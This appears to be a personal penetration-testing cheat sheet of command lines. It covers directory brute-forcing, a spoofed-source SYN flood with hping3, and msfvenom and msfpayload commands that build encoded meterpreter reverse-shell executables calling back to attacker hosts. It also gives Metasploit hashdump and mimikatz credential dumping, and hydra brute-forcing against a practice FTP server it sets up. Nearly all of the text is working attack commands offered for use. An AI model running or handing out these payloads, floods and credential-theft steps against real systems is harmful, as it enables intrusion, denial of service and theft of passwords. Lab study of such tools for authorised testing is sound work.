Scanning subdirectories of a website:
dirb http://10.10.10.7 /usr/share/wordlists/dirb/big.txt
dirb http://10.10.10.7
python3 dirsearch.py -u http://10.10.10.7 -e all

Denial of Service Attack
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source www.hping3testsite.com

http://pwndizzle.blogspot.co.uk/2014/12/crest-crt-exam-preparation.html
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.1 LPORT=4445 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 > custom.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.1.3.19 LPORT=4444 -a x86 -f exe -e x86/shikata_ga_nai -b '\x00' -i 3 > meter.exe


Hacking windows box using metasploit and mimikatz
Run nmap versus the host, see what vulnerable services are running
msfconsole - use /whatever/exploit
hashdump - dump all password hashes for a target host
load mimikatz
^run the above command in the meterpreter shell to start mimikatz
run the 'kerberos' command to dump windows passwords on certain vulnerable systems
Ncrack

If speed is of the essence in nmap, use the -F flag ;)
nmap -F 192.168.0.*

Setting up ftp server to practice password cracking
apt-get install vsftpd

adduser sysadmin
password iloveyou
mkdir /home/sysadmin/ftp
chown nobody:nogroup /home/sysadmin/ftp
chmod a-w /home/sysadmin/ftp
mkdir /home/sysadmin/ftp/files
chown sysadmin:sysadmin /home/sysadmin/ftp/files
ls -la /home/sysadmin/ftp
nano /etc/vsftpd.conf
write_enable=YES
add
pasv_min_port=40000
pasv_max_port=50000
userlist_enable=YES
userlist_file=/etc/vsftpd.userlist
userlist_deny=NO
echo "sysadmin" | tee -a /etc/vsftpd.userlist
systemctl restart vsftpd
so this sets up the environment on the target linux host
nmap 10.10.10.2
nmap the host and you should see the ftp service is open
#msfconsole
#use auxiliary/scanner/ftp/ftp_login
#set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
#set user_file /usr/share/metasploit-framework/data/wordlists/unix_users.txt
#set threads 55
#ncrack and ftp _login module are slow af, use hydra instead
hydra -P /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt -L /usr/share/metasploit-framework/data/wordlists/unix_users.txt 10.10.10.2 ftp
#run